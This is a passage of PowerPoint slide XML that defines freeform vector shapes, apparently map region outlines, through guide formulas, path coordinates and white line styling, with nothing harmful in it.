                  <a:gd name="T45" fmla="*/ 3 h 59"/>
                  <a:gd name="T46" fmla="*/ 33 w 61"/>
                  <a:gd name="T47" fmla="*/ 5 h 59"/>
                  <a:gd name="T48" fmla="*/ 36 w 61"/>
                  <a:gd name="T49" fmla="*/ 3 h 59"/>
                  <a:gd name="T50" fmla="*/ 39 w 61"/>
                  <a:gd name="T51" fmla="*/ 4 h 59"/>
                  <a:gd name="T52" fmla="*/ 42 w 61"/>
                  <a:gd name="T53" fmla="*/ 3 h 59"/>
                  <a:gd name="T54" fmla="*/ 44 w 61"/>
                  <a:gd name="T55" fmla="*/ 5 h 59"/>
                  <a:gd name="T56" fmla="*/ 47 w 61"/>
                  <a:gd name="T57" fmla="*/ 5 h 59"/>
                  <a:gd name="T58" fmla="*/ 48 w 61"/>
                  <a:gd name="T59" fmla="*/ 7 h 59"/>
                  <a:gd name="T60" fmla="*/ 50 w 61"/>
                  <a:gd name="T61" fmla="*/ 9 h 59"/>
                  <a:gd name="T62" fmla="*/ 54 w 61"/>
                  <a:gd name="T63" fmla="*/ 8 h 59"/>
                  <a:gd name="T64" fmla="*/ 57 w 61"/>
                  <a:gd name="T65" fmla="*/ 8 h 59"/>
                  <a:gd name="T66" fmla="*/ 57 w 61"/>
                  <a:gd name="T67" fmla="*/ 12 h 59"/>
                  <a:gd name="T68" fmla="*/ 54 w 61"/>
                  <a:gd name="T69" fmla="*/ 16 h 59"/>
                  <a:gd name="T70" fmla="*/ 54 w 61"/>
                  <a:gd name="T71" fmla="*/ 19 h 59"/>
                  <a:gd name="T72" fmla="*/ 54 w 61"/>
                  <a:gd name="T73" fmla="*/ 22 h 59"/>
                  <a:gd name="T74" fmla="*/ 57 w 61"/>
                  <a:gd name="T75" fmla="*/ 23 h 59"/>
                  <a:gd name="T76" fmla="*/ 59 w 61"/>
                  <a:gd name="T77" fmla="*/ 26 h 59"/>
                  <a:gd name="T78" fmla="*/ 61 w 61"/>
                  <a:gd name="T79" fmla="*/ 27 h 59"/>
                  <a:gd name="T80" fmla="*/ 59 w 61"/>
                  <a:gd name="T81" fmla="*/ 29 h 59"/>
                  <a:gd name="T82" fmla="*/ 56 w 61"/>
                  <a:gd name="T83" fmla="*/ 28 h 59"/>
                  <a:gd name="T84" fmla="*/ 57 w 61"/>
                  <a:gd name="T85" fmla="*/ 31 h 59"/>
                  <a:gd name="T86" fmla="*/ 60 w 61"/>
                  <a:gd name="T87" fmla="*/ 36 h 59"/>
                  <a:gd name="T88" fmla="*/ 58 w 61"/>
                  <a:gd name="T89" fmla="*/ 37 h 59"/>
                  <a:gd name="T90" fmla="*/ 57 w 61"/>
                  <a:gd name="T91" fmla="*/ 37 h 59"/>
                  <a:gd name="T92" fmla="*/ 55 w 61"/>
                  <a:gd name="T93" fmla="*/ 38 h 59"/>
                  <a:gd name="T94" fmla="*/ 52 w 61"/>
                  <a:gd name="T95" fmla="*/ 38 h 59"/>
                  <a:gd name="T96" fmla="*/ 51 w 61"/>
                  <a:gd name="T97" fmla="*/ 40 h 59"/>
                  <a:gd name="T98" fmla="*/ 53 w 61"/>
                  <a:gd name="T99" fmla="*/ 44 h 59"/>
                  <a:gd name="T100" fmla="*/ 51 w 61"/>
                  <a:gd name="T101" fmla="*/ 44 h 59"/>
                  <a:gd name="T102" fmla="*/ 49 w 61"/>
                  <a:gd name="T103" fmla="*/ 43 h 59"/>
                  <a:gd name="T104" fmla="*/ 47 w 61"/>
                  <a:gd name="T105" fmla="*/ 45 h 59"/>
                  <a:gd name="T106" fmla="*/ 46 w 61"/>
                  <a:gd name="T107" fmla="*/ 48 h 59"/>
                  <a:gd name="T108" fmla="*/ 45 w 61"/>
                  <a:gd name="T109" fmla="*/ 49 h 59"/>
                  <a:gd name="T110" fmla="*/ 43 w 61"/>
                  <a:gd name="T111" fmla="*/ 52 h 59"/>
                  <a:gd name="T112" fmla="*/ 43 w 61"/>
                  <a:gd name="T113" fmla="*/ 55 h 59"/>
                  <a:gd name="T114" fmla="*/ 45 w 61"/>
                  <a:gd name="T115" fmla="*/ 57 h 59"/>
                  <a:gd name="T116" fmla="*/ 42 w 61"/>
                  <a:gd name="T117" fmla="*/ 59 h 59"/>
                  <a:gd name="T118" fmla="*/ 40 w 61"/>
                  <a:gd name="T119" fmla="*/ 59 h 59"/>
                  <a:gd name="T120" fmla="*/ 36 w 61"/>
                  <a:gd name="T121" fmla="*/ 55 h 59"/>
                  <a:gd name="T122" fmla="*/ 33 w 61"/>
                  <a:gd name="T123" fmla="*/ 53 h 59"/>
                  <a:gd name="T124" fmla="*/ 31 w 61"/>
                  <a:gd name="T125" fmla="*/ 52 h 59"/>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61"/>
                  <a:gd name="T190" fmla="*/ 0 h 59"/>
                  <a:gd name="T191" fmla="*/ 61 w 61"/>
                  <a:gd name="T192" fmla="*/ 59 h 59"/>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61" h="59">
                    <a:moveTo>
                      <a:pt x="30" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="53"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36270" name="Freeform 403"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2889" y="2052"/>
                <a:ext cx="125" cy="61"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 125"/>
                  <a:gd name="T1" fmla="*/ 33 h 61"/>
                  <a:gd name="T2" fmla="*/ 5 w 125"/>
                  <a:gd name="T3" fmla="*/ 33 h 61"/>
                  <a:gd name="T4" fmla="*/ 8 w 125"/>
                  <a:gd name="T5" fmla="*/ 34 h 61"/>
                  <a:gd name="T6" fmla="*/ 9 w 125"/>
                  <a:gd name="T7" fmla="*/ 37 h 61"/>
                  <a:gd name="T8" fmla="*/ 10 w 125"/>
                  <a:gd name="T9" fmla="*/ 39 h 61"/>
                  <a:gd name="T10" fmla="*/ 15 w 125"/>
                  <a:gd name="T11" fmla="*/ 36 h 61"/>
                  <a:gd name="T12" fmla="*/ 16 w 125"/>
                  <a:gd name="T13" fmla="*/ 33 h 61"/>
                  <a:gd name="T14" fmla="*/ 22 w 125"/>
                  <a:gd name="T15" fmla="*/ 33 h 61"/>
                  <a:gd name="T16" fmla="*/ 23 w 125"/>
                  <a:gd name="T17" fmla="*/ 36 h 61"/>
                  <a:gd name="T18" fmla="*/ 30 w 125"/>
                  <a:gd name="T19" fmla="*/ 35 h 61"/>
                  <a:gd name="T20" fmla="*/ 33 w 125"/>
                  <a:gd name="T21" fmla="*/ 34 h 61"/>
                  <a:gd name="T22" fmla="*/ 43 w 125"/>
                  <a:gd name="T23" fmla="*/ 31 h 61"/>
                  <a:gd name="T24" fmla="*/ 46 w 125"/>
                  <a:gd name="T25" fmla="*/ 29 h 61"/>
                  <a:gd name="T26" fmla="*/ 52 w 125"/>
                  <a:gd name="T27" fmla="*/ 30 h 61"/>
                  <a:gd name="T28" fmla="*/ 52 w 125"/>
                  <a:gd name="T29" fmla="*/ 33 h 61"/>
                  <a:gd name="T30" fmla="*/ 56 w 125"/>
                  <a:gd name="T31" fmla="*/ 34 h 61"/>
                  <a:gd name="T32" fmla="*/ 56 w 125"/>
                  <a:gd name="T33" fmla="*/ 29 h 61"/>
                  <a:gd name="T34" fmla="*/ 55 w 125"/>
                  <a:gd name="T35" fmla="*/ 26 h 61"/>
                  <a:gd name="T36" fmla="*/ 54 w 125"/>
                  <a:gd name="T37" fmla="*/ 17 h 61"/>
                  <a:gd name="T38" fmla="*/ 62 w 125"/>
                  <a:gd name="T39" fmla="*/ 12 h 61"/>
                  <a:gd name="T40" fmla="*/ 63 w 125"/>
                  <a:gd name="T41" fmla="*/ 8 h 61"/>
                  <a:gd name="T42" fmla="*/ 71 w 125"/>
                  <a:gd name="T43" fmla="*/ 7 h 61"/>
                  <a:gd name="T44" fmla="*/ 75 w 125"/>
                  <a:gd name="T45" fmla="*/ 9 h 61"/>
                  <a:gd name="T46" fmla="*/ 83 w 125"/>
                  <a:gd name="T47" fmla="*/ 8 h 61"/>
                  <a:gd name="T48" fmla="*/ 98 w 125"/>
                  <a:gd name="T49" fmla="*/ 3 h 61"/>
                  <a:gd name="T50" fmla="*/ 115 w 125"/>
                  <a:gd name="T51" fmla="*/ 4 h 61"/>
                  <a:gd name="T52" fmla="*/ 119 w 125"/>
                  <a:gd name="T53" fmla="*/ 7 h 61"/>
                  <a:gd name="T54" fmla="*/ 118 w 125"/>
                  <a:gd name="T55" fmla="*/ 14 h 61"/>
                  <a:gd name="T56" fmla="*/ 125 w 125"/>
                  <a:gd name="T57" fmla="*/ 23 h 61"/>
                  <a:gd name="T58" fmla="*/ 120 w 125"/>
                  <a:gd name="T59" fmla="*/ 30 h 61"/>
                  <a:gd name="T60" fmla="*/ 114 w 125"/>
                  <a:gd name="T61" fmla="*/ 29 h 61"/>
                  <a:gd name="T62" fmla="*/ 110 w 125"/>
                  <a:gd name="T63" fmla="*/ 31 h 61"/>
                  <a:gd name="T64" fmla="*/ 114 w 125"/>
                  <a:gd name="T65" fmla="*/ 34 h 61"/>
                  <a:gd name="T66" fmla="*/ 110 w 125"/>
                  <a:gd name="T67" fmla="*/ 37 h 61"/>
                  <a:gd name="T68" fmla="*/ 112 w 125"/>
                  <a:gd name="T69" fmla="*/ 43 h 61"/>
                  <a:gd name="T70" fmla="*/ 108 w 125"/>
                  <a:gd name="T71" fmla="*/ 49 h 61"/>
                  <a:gd name="T72" fmla="*/ 104 w 125"/>
                  <a:gd name="T73" fmla="*/ 54 h 61"/>
                  <a:gd name="T74" fmla="*/ 95 w 125"/>
                  <a:gd name="T75" fmla="*/ 55 h 61"/>
                  <a:gd name="T76" fmla="*/ 85 w 125"/>
                  <a:gd name="T77" fmla="*/ 56 h 61"/>
                  <a:gd name="T78" fmla="*/ 78 w 125"/>
                  <a:gd name="T79" fmla="*/ 59 h 61"/>
                  <a:gd name="T80" fmla="*/ 73 w 125"/>
                  <a:gd name="T81" fmla="*/ 58 h 61"/>
                  <a:gd name="T82" fmla="*/ 62 w 125"/>
                  <a:gd name="T83" fmla="*/ 56 h 61"/>
                  <a:gd name="T84" fmla="*/ 46 w 125"/>
                  <a:gd name="T85" fmla="*/ 53 h 61"/>
                  <a:gd name="T86" fmla="*/ 42 w 125"/>
                  <a:gd name="T87" fmla="*/ 48 h 61"/>
                  <a:gd name="T88" fmla="*/ 35 w 125"/>
                  <a:gd name="T89" fmla="*/ 46 h 61"/>
                  <a:gd name="T90" fmla="*/ 30 w 125"/>
                  <a:gd name="T91" fmla="*/ 46 h 61"/>
                  <a:gd name="T92" fmla="*/ 26 w 125"/>
                  <a:gd name="T93" fmla="*/ 47 h 61"/>
                  <a:gd name="T94" fmla="*/ 20 w 125"/>
                  <a:gd name="T95" fmla="*/ 51 h 61"/>
                  <a:gd name="T96" fmla="*/ 15 w 125"/>
                  <a:gd name="T97" fmla="*/ 47 h 61"/>
                  <a:gd name="T98" fmla="*/ 9 w 125"/>
                  <a:gd name="T99" fmla="*/ 49 h 61"/>
                  <a:gd name="T100" fmla="*/ 5 w 125"/>
                  <a:gd name="T101" fmla="*/ 45 h 61"/>
                  <a:gd name="T102" fmla="*/ 2 w 125"/>
                  <a:gd name="T103" fmla="*/ 43 h 61"/>
                  <a:gd name="T104" fmla="*/ 2 w 125"/>
                  <a:gd name="T105" fmla="*/ 37 h 61"/>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25"/>
                  <a:gd name="T160" fmla="*/ 0 h 61"/>
                  <a:gd name="T161" fmla="*/ 125 w 125"/>
                  <a:gd name="T162" fmla="*/ 61 h 61"/>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25" h="61">
                    <a:moveTo>
                      <a:pt x="1" y="33"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
